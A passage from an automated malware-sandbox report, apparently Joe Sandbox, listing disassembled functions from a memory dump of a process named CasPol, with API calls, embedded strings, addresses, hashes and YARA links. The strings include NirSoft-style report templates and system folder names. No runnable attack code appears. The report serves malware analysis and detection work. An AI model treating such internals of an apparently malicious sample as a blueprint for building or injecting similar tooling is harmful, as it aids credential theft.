                                                                                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                    • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                                                    • String ID: PD$PD
                                                                                                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                                                                                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2163313125-0
                                                                                                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                                                                                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                                                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                    • String ID: ($d
                                                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                                                    • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 59245283-0
